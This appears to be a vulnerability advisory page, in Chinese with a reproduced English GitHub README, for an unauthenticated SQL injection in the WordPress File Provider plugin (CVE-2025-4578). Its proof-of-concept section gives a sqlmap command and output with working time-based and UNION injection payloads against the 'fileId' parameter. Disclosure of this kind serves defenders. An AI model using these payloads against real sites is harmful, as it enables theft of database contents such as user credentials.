File Provider SQL注入漏洞

漏洞信息

漏洞名称： File Provider SQL注入漏洞

漏洞编号：

• CVE： CVE-2025-4578

漏洞类型： SQL注入

漏洞等级： 高危

漏洞描述： File Provider是WordPress的一个插件，用于提供文件管理和下载功能。它广泛应用于需要文件共享和管理的WordPress网站中。由于其功能的普遍需求，该插件在多个行业和规模的网站中都有部署。此次发现的漏洞影响了该插件的所有版本，包括最新的1.2.3版本。

该漏洞属于SQL注入类型，具体存在于处理’fileId’参数的过程中。由于对用户提供的参数进行了不充分的转义，并且现有的SQL查询缺乏足够的准备，攻击者可以在未经认证的情况下，通过构造恶意的’fileId’参数值，将额外的SQL查询附加到现有的查询中。这种攻击方式可以被用来从数据库中提取敏感信息。

此漏洞的安全风险较高，因为它允许未认证的攻击者远程执行SQL查询，可能导致数据库中的敏感信息泄露，如用户凭证、个人信息等。由于攻击不需要任何形式的认证，且可以通过自动化工具（如sqlmap）进行利用，因此其潜在影响范围广泛，特别是在未及时更新插件的网站上。

产品厂商： WordPress

产品名称： File Provider

影响版本： <= 1.2.3

来源： https://github.com/RandomRobbieBF/CVE-2025-4578

类型： CVE-2025:github search

仓库文件

• README.md

来源概述

CVE-2025-4578

File Provider <= 1.2.3 - Unauthenticated SQL Injection

Description

The File Provider plugin for WordPress is vulnerable to SQL Injection via the ‘fileId’ parameter in all versions up to, and including, 1.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Details

• Type: plugin
• Slug: file-provider
• Affected Version: 1.2.3
• CVSS Score: 7.5
• CVSS Rating: High
• CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
• CVE: CVE-2025-4578
• Status: Closed

POC

sqlmap.py -u "http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=*" --dbs --batch --dbms mysql --level=5 --risk=3 --threads=1 --time-sec=5
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.7.3#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:27:43 /2025-07-10/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[12:27:44] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:27:44] [INFO] testing connection to the target URL
[12:27:44] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=3c848e84eb9...0a1642563d'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=(SELECT 6405 FROM (SELECT(SLEEP(5)))IWaW)

    Type: UNION query
    Title: Generic UNION query (random number) - 1 column
    Payload: http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php?action=dfp_download_file&fileId=-9489 UNION ALL SELECT CONCAT(0x7170717671,0x7a444e596a635a4a5973674b546c5748505855427457424358546451667473444c444c614f455173,0x71626b7171)-- -
---
[12:27:44] [INFO] testing MySQL
[12:27:45] [INFO] confirming MySQL
[12:27:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP 8.2.28, PHP, Apache 2.4.62
back-end DBMS: MySQL >= 9.0.0
[12:27:45] [INFO] fetching database names
[12:27:45] [INFO] retrieved: 'information_schema'
[12:27:45] [INFO] retrieved: 'performance_schema'
[12:27:45] [INFO] retrieved: 'exampledb'